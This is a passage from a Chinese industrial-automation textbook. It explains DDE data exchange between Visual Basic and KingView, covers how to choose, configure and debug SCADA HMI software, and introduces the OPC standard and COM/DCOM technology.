为了解决这些问题,我们采用DDE与组态软件通信的方式,开发了一个独立的应用程序,该程序可以读、写组态王的实时数据。而该应用程序又和远程实验管理软件进行通信,很好地解决了上述问题。 5.6.2 用DDE扩展组态软件功能 从上述介绍可知,通过DDE从应用程序读组态王中的实时数据与应用程序向组态王写数据的实现方法不一样,我们用Visual Basic开发的应用程序中,是采用两个窗体分别实现这两个功能的。 DDE是英文Dynamic Data Exchange的缩写,即动态数据交换。它最早是随Windows3.1而被提出的。目前的操作系统中仍然支持DDE技术,但微软已经停止发展该技术,只是保持对DDE技术的继续兼容和支持。 两个同时运行的程序之间通过DDE方式交换数据时是Client/Server关系。一旦Client 和Server建立了连接关系,则当Server中的数据发生变化后,就马上通知Client。通过DDE方式建立的数据连接通道是双向的,即Client不但能够读取Server中的数据,而且可以对其进行修改。 Windows操作系统中有一个专门协调DDE通信的程序DDEML(DDE管理库)。实际上Client和Server之间的多数会话并不是直达对方的,而是经由DDEML中转。一个程序可以同时是Client和Server。 DDE的方式有冷连接(Cool Link)、温连接(Warm Link)和热连接(Hot Link)3种。在冷连接方式下,当Server中的数据发生变化后不通知Client,但Client可以随时从Server 读/写数据。在温连接方式下,当Server中的数据发生变化后马上通知Client,Client得到通知后将数据取回。在热连接方式下,当Server中的数据发生变化后马上通知Client,同时将变化的数据直接送给Client。 1.应用程序通过DDE读组态王的数据 新建一个VB工程,添加一个窗体,该窗体命名为“frmViewToVB”。在窗体中添加文本框,如TEXT1表示上水箱液位。而上水箱液位在组态王的数据词典中是“T1LEVEL”,其定义如图5.11所示。 这里要注意,要在“允许DDE”选项前打钩。而且,只有I/O类型的变量才能通过DDE与应用程序通信,内存变量不能通过DDE与应用程序通信。 在VB的应用程序中,在frmViewToVB_LOAD中添加如下代码: 通过上述设置,分别运行组态王与VB应用程序后,VB应用程序就可以读取组态王中的“T1LEVEL”实时数据了。 图5.11 液位变量定义串口 2.组态王通过DDE读应用程序的数据 这里要实现组态王读取应用程序中的文本框txtName,该变量表示向组态王中传递当前要进行实验的学生的名字。这是一个字符串变量。 在VB项目中添加窗体“frmVBToView”,设置该窗体的LinkMode属性为“1”,LinkTopic为“formVBtoView”。在该窗体中建立文本框“StuName”。把该工程保存为VBToViewDDE.vbp,然后选择“工程→属性窗口”,设置工程的应用程序标题为“vbtoview”。然后可以生成可执行文件VBToViewDDE.exe。 在工程浏览器中,从左边的工程目录显示区中选择“设备\DDE”,然后在右边的内容显示区中双击“新建”图标,则弹出“设备配置向导”,添加一个名为VBDDE的DDE设备,该设备配置如图5.12所示。这里要特别注意的是,图5.12中的服务程序名是在VB工程中所设置的应用程序名字,而非生成的可执行程序的名字。如本例所示,这里应该填入“vbtoview”,而非“vbtoviewdde”。否则组态王运行系统会提示找不到DDE设备。话题名就是VB窗体“frmVBToView”的LinkTopic属性中设置的“formVBtoView”。另外,数据交换方式要选择“标准的Windows项目交换”而不是“高速块交换”,否则DDE通信也不成功。 图5.12 DDE设备定义 DDE设备定义好后,就可以在数据词典中定义变量了。变量定义窗口如图5.13所示。这里连接设备就是建立的名为vbdde的设备,而项目名要填写VB工程窗体中的文本框的名字“StuName”。 通过上述扩展,可以把在组态王中较难实现的功能在独立的应用程序中来实现,而相关的变量通过DDE通信实现。这样做的好处是可以充分发挥组态王开发监控系统的优点,又可以发挥高级语言编程的优点,实现更加复杂的控制、管理功能。 除了可以采用DDE外,组态王还支持OPC规范,因此,还可以采用OPC技术,来扩展组态王的功能,这里不再进行介绍。 图5.13 DDE通信变量定义 5.7 用组态软件开发SCADA系统上位机人机界面 不论选用什么样的组态软件开发SCADA系统的人机界面,通常包括以下一些内容。当然,具体组态工作除了与监控系统要求有关外,还取决于所选用的组态软件,不同的组态软件在完成类似功能时会有不同的操作方法和步骤。 5.7.1 组态软件选型 目前组态软件种类繁多,各具特色,任一组态软件都有其优点和不足。通常进行选型时,要考虑如下几个方面。 1.系统规模 系统规模的大小在很大程度上决定了可选择的组态软件的范围,对于一些大型系统,如城市燃气SCADA系统,西气东输SCADA等。考虑到系统的稳定性和可靠性,通常都使用国外有名的组态软件。而且,国外一些组态软件供应商,能提供软、硬件整体解决方案,确保系统性能,并能够提供长期服务。如澳大利亚的CITEC(已经被施耐德收购),美国GE的iFIX,德国西门子的WinCC和英国的Intouch等。对于一些中、小型系统,完全可以选择国产的组态软件,应该说,在中、小规模的SCADA系统上,国产组态软件是有一定优势的,性价比较高。 各种组态软件,其价格是按照系统规模来定的。组态软件的基本系统通常是以I/O点数来计算的,并以64点的整数倍来划分的,如64点、128点、256点、512点、1024点及无限点等。不同的软件市场策略不同,点数的划分也不一样。组态软件中,I/O点包含两种类型,一种是组态软件数据字典中定义的与现场I/O设备连接的变量,对模拟输入和输出设备,就对应模拟I/O变量;对数字设备,如电机的启、停和故障等信号,就对应数字I/O变量。I/O变量还有另外一种情况,即PLC中用于控制目的而用到的寄存器变量,如三菱电机中的M和D等寄存器,若这些寄存器变量在组态软件中进行了定义,也要进行统计。另一种就是软件设计中要用到的内部变量,这些内部变量也在数据字典中定义,但它们不和现场设备连接。这里要特别注意的是,不同的组态软件对I/O点的定义不同,有些软件的I/O点是指前者,如iFIX;而有些软件的I/O点是指两种的总和,如组态王。通常在选型中,考虑到系统扩展等,I/O点数要有20%裕量。 2.组态软件的稳定性和可靠性 组态软件应用于工业控制,因此其稳定性和可靠性十分重要。一些组态软件应用于小的SCADA系统,其性能不错,但随着系统规模的变大,其稳定性和可靠性就会大大下降,有些甚至不能满足要求。目前考察组态软件稳定性和可靠性主要根据该软件在工业过程,特别是大型工业过程的应用情况。如CITEC在澳大利亚的采矿厂SCADA中的应用,其I/O点数超过10万,在国内宝钢,也有上万点的应用,因此,该软件在大型项目中有一定的应用。当然,随着国产组态软件应用的工程应用案例不断增加,功能的不断升级,在一些大型工程中,已经见到国产组态软件的成功应用。 3.软件价格 软件价格也是在组态软件选型中考虑的重要方面。组态软件的价格随着点数的增加而增加。不同的组态软件,价格相差较大。在满足系统性能要求的情况下,可以选择价格较低的产品。购买组态软件时,还应注意该软件开发版和运行版的使用。有些组态软件,其开发版只能用于开发,不能在现场长期运行,如组态王。而有些组态软件,其开发版也可以在现场运行。因此,若用组态王开发SCADA系统的人机界面,就要同时购买开发版(I/O点数大于64时)和运行版。目前许多组态软件还分服务器和客户机版本,服务器与现场设备通信,并为客户机提供数据。而客户机本身不与现场设备通信,客户机的License价格较低。因此对于大型的SCADA系统,通常可以配置一个或多个SCADA服务器,再根据需要配置多个客户机,这样可以有较高的性价比。 4.对I/O设备的支持 对I/O设备的支持即驱动问题,这一点对组态软件十分重要。再好的组态软件,如果不能和已选型的现场设备通信,也不能选用,除非组态软件供应商同意替客户开发该设备的驱动,当然,这很可能要付出一定的经济代价。目前组态软件支持的通信方式包括: (1)专用驱动程序,如各种板卡、串口等设备的驱动。 (2)DDE、OPC等方式,DDE 属淘汰的技术,但仍然在大量使用;而OPC是比较新的方式,但目前还没有专用驱动丰富。 (3)ActiveX形式的驱动。国产的组态软件对板卡、仪表与模型等设备的驱动极其丰富,而国外组态软件由于市场定位在高端,因此其对这些硬件设备的支持较差。 5.软件的开放性 现代工厂不再是自动化“孤岛”,非常强调信息的共享。因此组态软件的开放性变得十分重要,组态软件的开放性包含两个方面的含义:一是指它与现场设备的通信。二是指它作为数据服务器,与管理系统等其他信息系统的通信能力。现在许多组态软件都支持OPC技术,即它即可以是OPC服务器,也可以是OPC客户。当然,对于小规模的系统,这一点会显得并不重要。 6.服务与升级 组态软件在使用中都会碰到或多或少的问题,因此能否得到及时的帮助变得十分重要。另外,还要考虑到系统升级要求,系统要能够平滑过渡到未来新的版本甚至新的操作系统。在这方面,不同的公司有不同的市场策略,购买前一定要求向软件供应商询问清楚,否则将来会有麻烦。 5.7.2 用组态软件设计SCADA人机界面 用组态软件设计SCADA系统的人机界面(上位机应用软件),包括以下几个方面。 1.根据系统要求的功能,进行总体设计 这是系统设计的起点和基础,如果总体设计有偏差,会给后续的工作带来较大麻烦。进行系统总体设计前,一定要吃透系统的功能需求有哪些,这些功能需求如何实现。系统总体设计主要体现在以下几个方面: (1)SCADA系统的总体结构是什么?有多少个SCADA服务器,多少个I/O服务器,多少个SCADA客户端,有多少Internet客户等。这些决定后,再配置相应的计算机、服务器、网络设备、打印机以及必要的软件,以构建系统的总体结构。 (2)是否要设计冗余SCADA服务器?对于重要的过程监控,应该进行冗余设计,这时,系统的结构上会复杂一些。 (3)若采用多个SCADA服务器和I/O服务器,就要确定下位机与哪台SCADA服务器通信。这里要合理分配,既要保证监控功能快速、准确实现,又要尽量使得每台SCADA服务器的负荷平均化,这样对系统稳定性和网络通信负荷都有利。 (4)SCADA服务器和下位机通信接口设计,这里必须要解决这些设备与组态软件的通信问题。确定通信接口形式和参数,并确保这样的通信速率满足系统对数据采集和监控的实时性要求。 (5)不同设备的参数配置,如不同计算机的IP地址等。 2.数据库组态,添加设备,定义变量等 数据库组态主要体系在添加I/O设备和定义变量。要注意添加的设备类型,选择正确的设备驱动。设备添加工作并不复杂,但在实际操作中,经常出现问题。虽然是采取组态方式来定义设备,但如果参数设置不恰当,通信常会不成功,因此参数设置要特别小心,一定要按照I/O设备用户手册来操作。在作者设计过的一个系统中,上位机组态软件选用WinCC 6.0,下位机配置了多台具有以太网模块的S7-300PLC。在添加设备时有一个参数是要填写某个S7-300PLC站CPU所在的槽号,我想当然地填写了以太网模块所在的槽号(因为过去为三菱电机Q系列以太网模块配置时,就是写以太网模块的起始地址),结果通信就是不成功,费了一些周折终于发现了这个问题。其他容易出现的问题包括设备的地址号、站号、通信参数等。 设备添加后,有条件的话可以在实验室测试一下通信是否成功,若不成功,继续修改并进行调试,直至成功为止。 设备添加成功后,就可以添加变量了。变量可以有I/O变量和内存变量。添加变量前一定要作规划,不要随意增加变量。比较好的做法是做出一个完整的I/O变量列表,标明变量名称、地址、类型、报警特性和报警值、标签名等,对模拟量还有量程、单位、标度变换等信息。对于一些具有非线性特性的变量进行标度变换时,需要做一个表格或定义一组公式。给变量命名最好有一定的实际意义,以方便后续的组态和调试,还可以在变量注释中写上具体的物理意义。对内存变量的添加也要谨慎,因为有些组态软件把这些点数也计入总的I/O点的。 对于大型的系统,变量很多,如果一个一个定义变量十分麻烦,现有的一些组态软件可以直接从PLC中读取变量作为标签,简化了变量定义工作;或者在EXCEL中定义变量,再导入到组态软件中。 3.显示画面组态 显示画面组态就是为计算机监控系统设计一个方便操作员使用的人机界面。画面组态要遵循人机工程学。画面组态前一定要确定现场运行的计算机的分辨率,最好保证设计时的分辨率与现场一样,否则会造成软件在现场运行时画面失真,特别是当画面中有位图时,很容易导致画面失真问题。画面组态常常因人而异,不同的人因其不同的审美观对同样的画面有不同的看法,有时意见较难统一。一个比较好的办法是把初步设计的画面组态给最终用户看,征询它们的意见。若画面组态做好后再修改就比较麻烦。画面组态包括以下一些内容: (1)根据监控功能的需要划分计算机显示屏幕,使得不同的区域显示不同的子画面。这里没有统一的画面布局方法,但有两种比较常用,如图5.14所示。由于目前大屏幕显示器多数都是宽屏,因此图5.14(b)的布局更加合理。总揽区主要有画面标题、当前报警行等。而按钮区主要有画面切换按钮和依赖于当前显示画面的显示与控制按钮。最大的窗口区域用作各种过程画面、放大的报警、趋势等画面显示。 (2)根据功能需要确定流程画面的数量、每个流程画面的具体设计,包括静态设计与动态设计,各个图形对象的属性,如大小、比例、颜色等。现有的组态软件都提供了丰富的图形库和工具箱,多数图形对象可以从中取出。图形设计时要正确处理画面美观、立体感强、动画与画面占用资源的矛盾。 (3)把画面中的一些对象与具体的参数连接起来,即做所谓的动画连接。通过这些动画连接,可以更好地显示过程参数的变化、设备状态的变化和操作流程的变化,并且方便工人操作。动画连接实际是把画面中的参数与变量标签连接的过程。变量标签包括以下几种类型:I/O设备连接(数据来源于I/O设备的过程)、网络数据库连接(数据来源于网络数据库的过程)、内部连接(本地数据库内部同一点或不同点的各参数之间的数据传递过程)。 显示画面中的不少对象在进行组态时,可以设置相应的操作权限甚至密码,这些对象对应的功能实现只对满足相应权限用户有效。 图5.14 显示画面的两种布局方式 4.报警组态 报警功能是SCADA系统人机界面重要功能之一,对确保安全生产起重要作用。它的作用是当被控的过程参数、SCADA系统通信参数及系统本身的某个参数偏离正常数值时,以声音、光线、闪烁等方式发出报警信号,提醒操作人员注意并采取相应的措施。报警组态的内容包括:报警的级别、报警限、报警方式、报警处理方式等。当然,这些功能的实现对于不同的组态软件会有所不同。 5.实时和历史趋势曲线组态 由于计算机在不停地采集数据,形成了大量的实时和历史数据,这些数据的变化趋势对了解生产情况和安全追忆等有重要作用。因此,组态软件都提供有实时和历史曲线控件,只要做一些组态就可以了。并非所有的参数都能查询到历史趋势,只有选择进行历史记录的参数才会保存在历史数据库中,才可以观察它们的历史曲线。 对于一个大型的系统,参数很多,如果每个参数都设置较小的记录周期,则历史数据库容量会很大,影响系统的运行。因此,一定要根据监控要求合理设置参数的记录属性及保存周期等。 6.报表组态及设计 报表组态包括日报、周报或月报的组态,报表的内容和形式由生产企业确定。报表可以统计实时数据,但更多的是历史数据的统计。绝大多数组态软件本身都不能做出很复杂的报表,一般的做法是采用Crystal Report(水晶报表)等专门的工具做报表,数据本身通过ODBC等接口从组态软件的数据库中提取。 7.控制组态和设计 由于多数人机界面只是起监控的作用,而不直接对生产过程进行控制,因此,用组态软件开发人机界面时没有复杂的控制组态。这里说的控制组态主要是当要进行远程监控时,相应的指令如何传递到下位机中,以通过下位机来执行。常用的做法是定义一些起制信息传递作用的标签(它们当然属于I/O变量,虽然不对应实际的过程仪表或设备),这些标签对应控制器中的内存变量或寄存器变量。在控制器编程时要考虑到这些变量对应的上位机的控制指令,并且明确是采用脉冲触发还是高、低电平触发。 8.策略组态 根据系统的功能要求、操作流程、安全要求、显示要求、控制方式等,确定该进行哪些策略组态及每个策略的组态内容。 9.用户的管理 对于比较大型的监控系统来说,用户管理十分重要。否则会影响安全操作甚至系统的安全运行。可以设置不同的用户组,它们有不同的权限。把用户归入到相应的用户组中。如工程师组的操作人员可以修改系统参数,对系统进行组态和修改,而普通用户组别的操作人员只能进行基本的操作。当然,根据需要还可以进一步细化。 5.7.3 SCADA系统中数据报表开发 SCADA系统中保存大量企业运行与操作数据,这些数据对于了解企业生产和运行、加强操作管理起重要作用。SCADA系统的报表是通过数据报表系统实现的,通过数据报表可以直观的和综合的表现SCADA系统存储数据的特性。数据报表的功能主要有: (1)提取存储在SCADA数据库中的各种基本数据和统计信息,可以以类似Excel等统一规范格式显示任意测控点在任意时间的数据记录及报警等事项,可以对数据进行比较、统计等计算,以发现数据中存在的统计特征。 (2)提供数据报表组态功能,可以进行报表格式的定制和表中数据项的数据源定义,可以定义提取数据的显示形式,对提取的数据进行统计、筛选和分析,并将分析结果转存和打印,用于企业存档、交流甚至考核。 (3)可以统计一段时间内操作人员的操作记录,以了解操作人员的操作是否正确,这有利于事故追忆。 SCADA系统中,数据报表的开发主要有以下几种形式: (1)通过组态软件提供的报表组态工具,设计绘制报表的格式。采取这种方式只能制作出形式和内容比较简单的报表,这些报表离企业的要求还有一定的距离。因此,通常采取其他的方式,开发符合企业要求的专门报表。 (2)通过通用的功能强大的办公软件来实现,典型的就是利用Excel进行报表组态,即把数据从SCADA系统的数据库导入到Excel中。 (3)用专用的报表开发工具开发。这种方式中数据也要从SCADA系统的数据库导入。这种方式可以开发出形式和功能比较复杂的报表,是SCADA中一种常用的报表开发方式。 5.7.4 SCADA系统人机界面的调试 在整个组态工作完成后,可以进行离线调试,检验系统的功能是否满足要求。调试中要确保机器连续运行数周时间,以观察是否有机器速度变慢甚至死机等现象。在反复测试后,再在现场进行联机调试,直到满足系统设计要求。 组态软件人机界面的调试是非常灵活的,为了验证所设计的功能是否与预期一致,可以随时由开发环境转入运行环境。人机界面的调试可以对每个开发好的人机界面进行调试,而不是等所有界面开发完成才对每个界面进行调试。 人机界面调试的主要内容有: (1)I/O设备配置:有条件的可以把I/O硬件与系统进行连接,进行调试,以确保设备正常工作。若有问题,要检查设备驱动是否正确、参数设置是否合理、硬件连接是否正确等。 (2)变量定义:外部变量定义与I/O设备联系紧密,要检查变量连接的设备、地址、类型、报警设置、记录等是否准确。 (3)初始画面设置是否合理:一般的组态软件,都要设置启动运行画面,即组态软件从开发状态进入运行状态后就被加载的画面。这些画面通常包括主菜单栏、主流程显示、LOGO条等。 (4)画面切换是否正确及流畅:组态软件工程中包括许多不同功能的画面,用户可以通过各种按钮等来切换画面,要测试这些画面切换是否正确和流畅,切换方式是否简捷、合理。考虑到系统的资源约束,在系统运行中,不可能把所有的画面都加载到内存中,因此若某些画面切换不流畅,可能是这些画面占用的资源较多,应该进行功能简化。 (5)数据显示:主要包括数据的链接是否正确、数据的显示格式和单位等是否准确。当工程中变量多了以后,常会出现变量链接错误,特别是采取复制等方式操作时,常会出现这样的错误。 (6)动画显示:动画显示是组态软件开发的人机界面最吸引眼球的特性之一,要检查动画功能是否准确、表达方式是否恰当、占用资源是否合理、效果是否逼真等。 (7)其他方面,包括报警、报表、策略组态等。 第6章 工业控制实时数据交换标准—OPC规范 6.1 OPC的开发背景和历史 工业控制系统中,除了DCS或SCADA系统中服务器与操作员站等设备之间的数据交换外,还存在以下数据交换问题: (1)控制系统监控层如何与现场硬件设备(如PLC、各种数据采集模块、智能仪表等)进行实时数据交换。 (2)用户自行开发的先进控制、在线优化等应用软件如何与DCS或SCADA系统进行实时数据交换。 (3)综合自动化系统厂级应用及MES层的调度、管理、监控等应用如何读/写底层工控系统的数据。其实时性要求要低于前面两种情况。 对于第一个问题,一个广泛使用的解决方案就是采用如图6.1所示的传统客户机/服务器模型。在此模型中,分别为不同的数据源(包括现场设备及软件数据库)开发不同的驱动程序(即服务器),然后,在各个应用程序(即客户机)中分别为不同的服务器开发不同的接口程序。 对于第二个问题,在DCS的开放性没有解决前是较难处理的。目前主要是通过OPC规范来实现。 对于第三个问题,通过配置实时/历史数据库,把工控底层数据归档到该数据库,可用通过标准的数据库接口访问实现。因为这层次的数据访问可看作是历史数据访问,与第一和第二个问题不同。 图6.1 基于驱动程序的客户机/服务器模型 采用图6.1所示的解决方案,对于由多种硬件和软件系统构成的复杂系统而言,其缺点是显而易见的:对客户应用程序开发方,要处理大量与接口有关的任务,不利于系统开发、维护和移植,因此这类系统的可靠性、稳定性及扩展性较差;对硬件开发商,要为不同的客户应用程序开发不同的硬件驱动程序。如何使技术人员专注于系统功能的开发,而不被复杂的数据接口问题所困扰是急待解决的问题。 在这样的背景下,OPC规范被提出来。OPC是OLE(Object Linking and Embedding)for Process Control的简称,即用于过程控制的对象链接与嵌入。早期的OPC标准是由Fisher-Rosement、Intellution、Rockwell Software、Intuitive Technology以及OPTO 22五家公司所组成的OPC特别工作小组在1995年开发的,微软同时作为技术顾问给予了支持。之后为了普及和进一步改进,于1996年8月完成了OPC数据访问标准版本1.0。OPC基金会(OPC Foundation)是1996年9月24日在美国达拉斯举行了第一次理事会,并于同年10月7日在美国的芝加哥举行的第一次全体大会上宣告正式成立的。中国于2001年12月正式成立了中国OPC促进会。OPC基金会从成立开始会员逐年增加,到目前为止在全球范围内已有众多公司加入了这个国际标准组织。同时由控制设备厂商和控制软件供应商提供的OPC产品也日益增加,目前已有几千种以上的OPC服务器产品和OPC应用程序产品出现在由OPC基金会发行的OPC产品目录上。符合OPC规范的产品的大量开发和使用又推动了该标准在更大范围内被接受,极大地促进了该标准的普及和应用。 现有的主要OPC标准如表6.1所示。 表6.1 OPC标准及其内容 OPC规范定义了一个工业标准接口,它基于微软的OLE/COM(Component Object Model,COM)技术,采用客户机/服务器结构,如图6.2所示。它使控制系统、现场设备与工厂管理层应用程序之间具有更大的互操作性。OLE/COM是一种客户机/服务器模式,具有语言无关性、代码重用性、易于集成性等优点。OPC规范了接口函数,不管现场设备以何种形式存在,客户都以统一的方式去访问,从而保证软件对客户的透明性,使得用户完全从底层的开发中脱离出来。OLE/COM的扩展远程OLE自动化与DCOM (Distributed COM)技术支持TCP/IP等多种网络协议,可以将OPC客户、服务器在物理上分开,分布于网络不同节点上。OPC把硬件供应商和软件开发商分离开来,硬件开发商通过提供带OPC接口的服务器,使得任何带有OPC接口的客户程序都可采用统一方式存取不同硬件厂商的设备。正是因为OPC技术的标准化和适用性,在短短的几年内得到了工控领域硬件和软件制造商的承认和支持,它已经成为工控软件业界公认的事实上的标准。 图6.2 基于OPC的客户机/服务器模型 目前,国内外研究最多和需求最大的就是OPC DA(OPC Data Access)数据存取规范,它也是其他OPC规范的基础。这里借助对OPC DA2.0规范详细的介绍来阐述OPC DA技术的体系结构及其应用设计等。 6.2 OPC的关键技术与体系结构 6.2.1 COM与DCOM技术 随着软件工业技术的迅速发展,传统的程序升级已经无法满足技术的发展需要,而且程序升级需要大量人力成本,解决这一问题的方法就是将应用程序分割成一些小的应用或组件,然后将这些组件在运行时组装起来以形成所需的应用程序,每一个组件都可以在不影响其他组件的情况下被升级。目前,在组件技术规范方面,主要有两个标准:一个是由对象管理组织(Object Management Group,OMG)起草并颁布的公共对象请求代理体系结构(Common Object Request Breaker Architecture,CORBA),另一个是由微软推出的组件对象模型(COM)技术。COM技术是在微软公司的对象链接与嵌入技术(OLE)基础上发展的,该技术提供了各个软件部件以标准模式在一起工作的框架和技术规范,此规范提供了为保证能够互操作、客户和组件应遵循的一些二进制和网络标准,在这种标准下,任意两个组件之间可以在不同的操作环境下进行通信,甚至使用不同的开发语言开发的组件也能实现。COM是一种软件组件间相互数据交换的有效方法。 组件实际上是一些小的二进制可执行程序。它可以给应用程序、操作系统以及其他组件提供一些服务。多个COM 对象可以连接起来以形成应用程序或组件系统,每一个应用程序都可划分为多个独立的模块进行开发,这里的每一个独立模块都是一个自给自足的组件。可以采取不同的开发语言去设计每一个组件。在运行时将这些组件通过接口组装起来以形成所需要的应用程序。 COM接口是COM规范中最重要的部分,COM规范的核心内容就是对接口的定义,COM都是以接口的形式出现。组件与组件之间、组件与客户程序之间都要通过接口进行交互。接口成员函数将负责为客户或其他组件提供服务。对于COM来说,接口是一个包含一个函数指针数组的内存结构。每一个数组元素包含的是一个由组件所实现的函数的地址。对于COM而言,接口就是组件内存结构。对于客户来说,一个组件就是一个接口集,任何一个具备相同接口的组件都可对此组件进行相对于其他组件透明的替换。只要接口不发生变化,就可以在不影响整个由组件构成的系统的情况下自由地更换组件。COM接口的内存结构与C++编译器为抽象基类所生成的内存结构是相同的,因此可以合用抽象基类来定义COM接口。 COM接口的名字以字母I开头。COM组件有两个最基本的接口类,分别是Iunknown 和IDispatch。 (1)所有的COM接口都必须继承一个名为IUnknown的接口,COM的核心接口是IUnknown接口。客户在组件之间的通信是通过接口来实现的。组件可以不提供其他接口,但是必须提供IUnknown接口,其原因在于IUnkown接口提供了两个非常重要的特性:生存期控制和接口查询。IUnknown接口提供成员函数QueryInterface()、AddRef()和Release(),分别用于查询组件中的其他接口和进行生存期控制。由于任何COM接口都是从IUnknown接口派生。因此在所有COM接口的虚拟函数表中保存的前3个成员函数指针一定是指向QueryInterface()、AddRef()和Release()的指针。这样,任何一个COM接口都可以被当作IUnknown接口来处理。在创建组件时,客户可以通过CreateInstance()函数得到IUnknown接口指针。 (2)Idispateh为调度接口。调度接口把每一个函数每一个属性都编上号。客户程序要调用这些函数属性时,把这些编号传给IDispatch接口就行了,IDispatch再根据这些编号调用相应的函数。为了使编写者在设计和维护程序时方便,也为了使用者容易学习、记忆和调用,COM还支持用户自定义接口。 在COM规范中并没有对COM对象进行严格的定义,但COM提供的是面向对象的组件模型,COM组件提供给客户的是以对象形式封装起来的实体,客户程序与COM组件程序进行交互的实体是COM对象,类似如C++语言中类(Class)的概念。COM对象也包含属性(状态)和方法(操作),对象的状态反映了对象的客户存在,也是区别于其他对象的要素,而对象所提供的函数就是对象提供给外界的接口,客户必须通过接口才能获得对象的服务。对于COM对象来说,接口是它与外界交互的唯一途径,因此,封装特性也是COM对象的基本特征。在COM模型中,对象本身对于客户来说是不可见的,客户请求服务时只能通过接口进行,每个COM对象是用一个128位的全局唯一标识符(Globally Unique Identifier,GUID)来标识的,称为CLSID(class identifier类标识和类ID)。由于GUID是一个随机数,所以并不绝对保证唯一性,但发生标识符相重的可能性非常小。GUID的随机性由两方面特性保证:一方面是空间,对于网络中的计算机,通常取网络适配器的地址位,没有网络适配器的机器用其他随机数生成算法产生;另一方面是时间位,同一机器在不同时候产生的标识符总不相同。CLSID是用来标识COM对象的GUID,因此,CLSID在结构上与GUID一致。 COM规范在开放软件基金会(Open Software Foundation,OSF)的分布式计算环境(Distributed Computing Environment,DCE)规范的描述远程调用接口描述语言 (InterfaceDescription Language,IDL)的基础上,进行扩展形成了COM接口的描述语言。接口描述语言提供了一种不依赖于任何语言的接口描述方法,因此,它可以成为组件程序和客户程序之间的共同语言。 分布式组件对象模型(Distributed COM,DCOM)是COM的网络扩展,它建立在COM之上,并且提供了一种使COM组件加入网络环境的透明网络协议,使COM对象能像在本机上一样在网络上彼此交互。DCOM技术的核心是地址透明性,它依赖对象远程过程调用(Object Remote Procedure Call,ORPC)来完成它所有的网络通信工作,使DCOM组件不仅能跨越进程边界,而且能跨越计算机间的物理边界而相互交换信息,程序员不必编写网络通信所需要的繁杂代码。在分布式计算机环境下,DCOM服务器和客户处于不同的地址空间,不能直接交互信息,客户和DCOM服务器通过代理(proxy)对象和存根(stub)模块间接地交互。 在Windows系统平台上,COM组件表现为一个DLL文件或exe可执行文件。一个组件程序可以包含一个或多个COM对象,并且每个COM对象可以实现多个接口。当其他组件或其客户程序调用组件的功能时,它首先创建一个COM对象或通过其他途径获得COM对象,然后通过对象所实现的COM接口调用其所提供的服务。当所有的服务结束后,如果客户程序不再需要该COM对象,那么它就应该释放该对象所占用的资源,包括对象本身。 6.2.2 COM主要特性 COM标准包括规范和实现两大部分。规范部分定义了组件和组件之间通信的机制,这些规范不依赖于任何特定的语言和操作系统;COM标准的实现部分是COM库,COM库为COM规范的具体实现提供了一些核心服务。COM的主要特性有: (1)COM采用客户/服务器模型。调用COM对象者称为客户,被调用者称为服务器;有的COM对象在自己被调用的同时,也会调用其他的COM对象,因而兼有客户和服务器的双重身份。 (2)语言无关性。COM规范不依赖于任何特定的语言。因此COM客户程序和COM服务器可以用完全不同的语言开发。这样使利用C++,Visual Basic,以及Excel中作为宏使用的应用程序的VBA等不同语言所开发的程序可以相互连接。之所以具有这样的特性,主要是因为对象与客户程序之间的交互采用的是二进制代码级的标准。 (3)进程透明性。COM对象在实现时可以有两种进程模型:进程内对象和进程外对象。如果是进程内对象,则其运行在客户进程空间内;如果是进程外对象,则其运行在同一机器上的另一个进程空间内或者在进程机器的进程空间内。进程模型的区别对于客户来说是透明的。一般来说,进程内模型的效率高,但是,如果组件不稳定会危及客户进程;相反,进程外模型稳定性好,但效率低。 (4)应用程序级可重用性。由于COM标准是建立在二进制代码级之上的,对COM对象的调用仅仅是通过接口来实现,因此,COM标准实现了对象在应用程序级而非源代码级的可重用性。 (5)不同版本兼容性好。与过去DLL的版本管理非常困难的问题相比,COM技术可以提供不同版本的COM服务器和COM客户程序之间的最大的兼容性。 (6)作为COM技术扩展的分布式COM技术,更可以使COM组件分布在不同的计算机上,并通过网络互相连接并互相交换数据。所以对于COM客户程序来说,同样像连接本地计算机上的COM服务器一样,去连接远程计算机上的COM服务器,当然通信的速度不太一样,但是重要的是不必对服务器程序进行修正就可以在网络上自由构成,如图6.3所示。 图6.3 利用COM和分布式COM达成的组件间的互相连接 6.2.3 基于OPC的客户机/服务器数据交换模型 COM技术的出现为控制设备和控制管理系统之间的数据交换简单化提供了技术基础。但是如果不提供一个工业标准化的COM接口,各个控制设备厂家开发的COM组件之间的相互连接仍然是不可能的。 OPC DA规范描述了OPC服务器需要实现的COM对象及其接口。OPC DA客户可以连接由一个或多个硬件设备供应商开发的OPC服务器,如图6.4所示。开发商提供的代码决定了每一个OPC服务器访问的设备和数据,以及服务器物理上如何访问数据的详细内容。服务器按进程模型可划分为进程内和进程外两种。其中进程外服务器和客户运行在不同的进程中,服务器和客户间采用本地过程调用和远程过程调用的方法通过代理、占位进行进程之间的通信。DCOM把COM的技术扩展到网络,支持不同的计算机上服务器与客户之间的相互通信。这些计算机可以在局域网内,也可以在广域网上,甚至可以通过Internet进行连接。所有底层网络协议的细节由DCOM负责处理,可以很方便地开发适合分布式环境下的客户机/服务器程序。采用该规范后,制造厂商、用户和系统集成商都可以实现各自的好处,具体表现在以下几方面。 (1)设备开发者:可以使设备驱动程序开发更加简单,即只要开发一套OPC服务器即可,而不是为不同的客户程序开发不同的设备驱动程序。这样它们可以更加专注于设备自身的开发,当设备升级时,只要修改OPC服务器的底层接口就可以。采用该规范后,设备开发者可以从驱动程序的开发中解放出来。 (2)系统集成商:可以从繁杂的应用程序接口中解脱出来,更加专注于应用程序功能的开发和实现,而且应用程序的升级也更加容易,不再受制于设备驱动程序。此外,开发人员可以在没有下位机硬件时通过OPC服务器的仿真功能来进行上位机系统功能测试,还可以通过OPC服务器仿真中的参数读写功能测试通信功能。而采用一般的设备驱动程序方式是无法实现开展上述测试的。 (3)用户:可以选用各种各样的商业软件包,使得系统构成的成本大为降低,性能更加优化。同时可以更加容易地实现由不同供应厂商提供的设备来构成混合的工业控制系统。 图6.4 基于OPC的客户机/服务器模型 